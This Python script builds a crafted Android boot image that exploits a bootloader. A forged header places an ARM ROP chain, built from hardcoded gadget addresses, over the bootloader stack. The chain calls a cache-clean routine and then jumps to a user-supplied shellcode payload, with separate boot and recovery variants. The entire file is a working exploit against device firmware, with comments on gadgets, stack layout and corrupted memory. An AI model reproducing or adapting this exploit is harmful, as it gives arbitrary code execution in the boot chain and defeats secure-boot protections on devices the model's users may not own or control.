#!/usr/bin/env python3
import sys
import struct
from argparse import ArgumentParser

# Base address of the bootloader image in RAM. Not referenced by the code
# visible here; presumably the base the gadget addresses below were taken
# relative to -- confirm.
base = 0x46000000

# Size in bytes of the crafted boot-image header written in front of the
# ROP body (see main()).
crafted_hdr_sz = 0x70
page_size = 4  # at least 4 for alignment
# NOTE: crafted_hdr_sz bytes before inject_addr become corrupt
# 2 * page_size bytes after inject_addr+inject_sz become corrupt
# Address at which the ROP body (and the payload following it) is expected
# to land.
inject_addr = 0x461416a0
# stack bottom      : 0x46141954
# stack top         : 0x4613f954
# corrupted region  : 0x46141630 - 0x46141838
#   i.e. inject_addr - crafted_hdr_sz .. inject_addr + inject_sz + 2 * page_size
#   per the NOTE above; this range lies inside the stack range listed here.

# Bytes available for the ROP body plus payload; also written as the
# header's kernel_size field.
inject_sz = 0x200 - crafted_hdr_sz

# Candidate gadgets; not referenced by the code visible here.
# 4600A542                 LDMIA           R1, {R1-R3}
# 4601ABD0                 LDMIA           R1, {R4-LR}^

# 4601B028                 LDMFD           SP!, {R0-R3,R12,LR,PC}^     ## ARM
# NOTE(review): main() uses 0x4601C7C8 as the address of this LDMFD gadget,
# not 0x4601B028 -- confirm which one matches the target firmware.

# Called by the ROP chain with R0 = inject_addr and R1 = inject_sz
# (presumably start/length of the range whose cache lines are cleaned and
# invalidated so the injected code can be executed -- TODO confirm).
arch_clean_invalidate_cache_range = 0x4601C5A0
# Not referenced by the code visible here.
fastboot_init = 0x4602A3C1

# Gadget used in "boot" mode: main() jumps to 0x46004EF9 (the +1 selects
# Thumb state, matching the 2-byte instruction spacing below). It calls R4,
# then skips three stack words and pops R4-R7 and PC.
#RAM:46004EF8                 BLX             R4
#RAM:46004EFA                 ASRS            R1, R0, #0x1F
#RAM:46004EFC                 ADD             SP, SP, #0xC
#RAM:46004EFE                 POP             {R4-R7,PC}


# Alternative gadget (calls R1, skips five stack words); not referenced by
# the code visible here.
#RAM:46004F1E                 BLX             R1
#RAM:46004F20                 ASRS            R1, R0, #0x1F
#RAM:46004F22                 ADD             SP, SP, #0x14
#RAM:46004F24                 POP             {R4-R7,PC}

def _read_original_image(path):
    """Return the parts of a stock boot image that are appended to the output.

    The first 0x400 bytes are kept, bytes 0x400-0x7ff are dropped, and
    everything from offset 0x800 to EOF is kept.
    """
    with open(path, "rb") as fin:
        orig = fin.read(0x400)
        fin.seek(0x800)
        orig += fin.read()
    return orig


def _build_header():
    """Build the crafted Android boot-image header, zero-padded to crafted_hdr_sz.

    kernel_size is set to inject_sz and kernel_addr to
    ``inject_addr - crafted_hdr_sz + page_size``. Presumably this makes the
    loader place image offset crafted_hdr_sz (the start of the ROP body) at
    inject_addr -- TODO confirm against the target bootloader.

    Raises:
        ValueError: if the populated fields do not fit in crafted_hdr_sz bytes.
    """
    hdr = b"ANDROID!"  # magic
    # kernel_size, kernel_addr
    hdr += struct.pack("<II", inject_sz, inject_addr - crafted_hdr_sz + page_size)
    # ramdisk_size, ramdisk_addr, second_size, second_addr, tags_addr,
    # page_size, unused, os_version
    hdr += struct.pack("<8I", 0, 0, 0, 0, 0, page_size, 0, 0)
    hdr += b"\x00" * 0x10  # name
    hdr += b"bootopt=64S3,32N2,32N2 buildvariant=user"  # cmdline
    if len(hdr) > crafted_hdr_sz:
        raise ValueError(
            "crafted header is %#x bytes, exceeds crafted_hdr_sz=%#x"
            % (len(hdr), crafted_hdr_sz))
    return hdr.ljust(crafted_hdr_sz, b"\x00")


def _pack_words(*words):
    """Pack each argument as a little-endian unsigned 32-bit word."""
    return struct.pack("<%dI" % len(words), *words)


def _build_rop_chain(mode):
    """Return the word chain written at inject_addr, ending where the payload starts.

    Both modes first hand inject_addr / inject_sz to
    arch_clean_invalidate_cache_range. They then transfer control to the
    payload placed directly after the chain.

    Args:
        mode: "boot" or "recovery".

    Raises:
        ValueError: for any other mode.
    """
    # The first four words are labelled as popped into R0, R4, R5 and PC --
    # presumably by the epilogue of the stack frame being overwritten.
    chain = _pack_words(
        0x40404040,                         # R0
        arch_clean_invalidate_cache_range,  # R4
        0x42424242,                         # R5
        0x4601C7C8,                         # PC: LDMFD SP!, {R0-R3,R12,LR,PC}^
        inject_addr,                        # R0: start address for the cache call
        inject_sz,                          # R1: length for the cache call
        0x03030303,                         # R2
        0x04040404,                         # R3
        0x12121212,                         # R12
    )
    if mode == "boot":
        chain += _pack_words(
            0xFEEFFEEF,                         # LR
            0x46004EF9,                         # PC: Thumb gadget "BLX R4; ...; POP {R4-R7,PC}"
            0x77000077, 0x88000088, 0x99000099,  # skipped by ADD SP, SP, #0xC
            0xAA1111AA,                         # R4
            0xBB1111BB,                         # R5
            0xBB1111BB,                         # R6
            0xBB1111BB,                         # R7
        )
        # The payload starts right after the final PC word appended below.
        shellcode_addr = inject_addr + len(chain) + 4
        chain += _pack_words(shellcode_addr)  # PC
    elif mode == "recovery":
        # LR + PC + 8 filler words = 40 bytes precede the payload.
        shellcode_addr = inject_addr + len(chain) + 40
        chain += _pack_words(
            shellcode_addr,                     # LR: return into the payload
            arch_clean_invalidate_cache_range,  # PC
        )
        chain += _pack_words(*([0x77000077] * 8))
    else:
        raise ValueError("Unknown mode")
    return chain


def main():
    """Write a crafted boot image: header + ROP chain + payload + stock image.

    Output layout: a 0x400-byte prefix holding the crafted header
    (crafted_hdr_sz bytes) and the chain plus payload zero-padded to
    inject_sz, then zero padding. The prefix is followed by the optional
    stock image as returned by _read_original_image. The address at which
    the payload is expected to run is printed to stdout.
    """
    parser = ArgumentParser(
        description="Build a crafted boot image that runs PAYLOAD via a ROP chain.")
    parser.add_argument('payload', help="raw payload binary appended after the ROP chain")
    parser.add_argument('-b', '--bootimg', help="stock boot image appended after the crafted prefix")
    parser.add_argument('-m', '--mode', required=True, choices=("boot", "recovery"),
                        help="Either boot or recovery")
    parser.add_argument('output', help="path of the image to write")
    args = parser.parse_args()

    orig = _read_original_image(args.bootimg) if args.bootimg else b""

    hdr = _build_header()
    chain = _build_rop_chain(args.mode)

    print("addr = %#x" % (inject_addr + len(chain)), flush=True)

    # shellcode binary
    with open(args.payload, "rb") as fin:
        shellcode = fin.read()

    body = chain + shellcode
    # Anything beyond inject_sz (the header's kernel_size) would be silently
    # dropped; the original code only noticed via a strippable assert.
    if len(body) > inject_sz:
        parser.error("payload too large: %d bytes, at most %d fit in %s mode"
                     % (len(shellcode), inject_sz - len(chain), args.mode))
    body = body.ljust(inject_sz, b"\x00")

    image = (hdr + body).ljust(0x400, b"\x00")
    if len(image) != 0x400:
        raise ValueError("crafted prefix is %#x bytes, expected 0x400" % len(image))
    image += orig

    with open(args.output, "wb") as fout:
        fout.write(image)


# Script entry point: run the builder only when executed directly, not on import.
if __name__ == "__main__":
    sys.exit(main())
